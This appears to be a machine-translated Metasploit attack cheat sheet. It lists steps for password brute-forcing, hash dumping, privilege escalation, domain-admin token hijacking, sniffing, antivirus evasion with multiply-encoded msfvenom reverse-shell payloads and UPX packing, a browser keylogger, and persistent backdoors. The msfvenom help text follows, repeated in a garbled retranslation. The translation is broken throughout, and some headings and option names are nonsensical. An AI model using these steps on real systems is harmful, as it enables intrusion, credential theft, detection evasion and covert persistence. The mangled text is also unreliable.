1. Password Security
Search mysql_login ssh_login
2.hash osmotic delivery
hashdump
3. kernel privilege escalation
getSystem
4. generated backdoor
linux:
The network penetration
1.run get_local_subnets: obtaining card, paragraph (c) scanning
2. use incognito: call hijacking domain management module
3.list_oken -u Domain Management Access those
4.impersonate_token user domain management
5.shell
6. The domain manager does not sniffer
7.use auxliary / sniffer / psnuffle run the sniffer module
VI. To avoid killing
1. You can try multiple coding:
msfvenom -p Windows / Meterpreter / reverse_tcp lhost = <Your IP Address> lport = <Your Port Connect to the On
Here the use of the pipeline to allow msfvenom attack load multiple coding, coding first with shikata_ga_nai 20 times, then 10 times to alpha_upper coding, coding countdown again 10 times, and finally to generate executable file calc.exe as a template.
2. upx be generated above the packers Trojan
upx Shell.exe
VII. Fun XSS
1.search Keylogger --http_javascript_keylogger
2.set DEMO to true
3. uripath the SET /
4.Set srvport 80
5. RUN
August. Maintain access
1. The premise of a session
2.run metsvc -A establish long back door
3 .exploit (Handler)> the SET payload Windows / metsvc_bind_tcp
4.options
5.keyscan_start keyloggers
6.keyscan_dump View keyloggers
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-l, - list <type> List [type] of all modules. Types: payload encoder, NOP, internet, Arch, encryption, format, all
-p, - payload payload <payload> to be used (--list payloads to list, - list options for arguments). Designated as a custom "-" or stdin
- the list of the list of options - standard payload and evade advanced options
-f, - format <format> output format (using the - list format to list)
-e , - - encoder <encoder> to use an encoder (encoder list to list use)
of new section name --sec name <value> when generating large windows binaries to use. Default: 4 random character string alpha
- minimum use of all available encoders produce the smallest possible payload
--encrypt <value> is applied to the housing code is encrypted or encoded type (List to use the encrypt --list)
--encrypt key --encrypt key <value> to be used for
--encrypt iv <value> initialization vector --encrypt
-a, the -arch <Arch> and architecture for --payload --encoder (using - Arch to List List)
--platform <platform> for - payload platform (use - listed platform to list)
-o, - OUT <path> payload saved to a file
-B, - - character error <list> exemplary character to be avoided: '
-n, - nosled <length> a prepositioned [length] nosled on the payload size
--pad nop specified by -n <length> nosled as the total size of the payload size, the number of automatic pretreatment nosled ( nops subtracting payload length)
-s, - space <length> the maximum size of the generated payload
- encoder space <length> encoding a payload and the maximum size (default value -s)
-i, - iteration <count> times the payload encoding
-C, - add code <path> specify other win32 housing code files to include
-x, - template <path> specify a custom executable file to be used as a template
- k, - holding --template behavior and payload as a new thread injection
-v, - var name <value> specify a particular output format for a custom variable names
-t, - timeout <second> read from stdin the number of seconds to wait for the time to take the payload (the default is 30, 0 disables)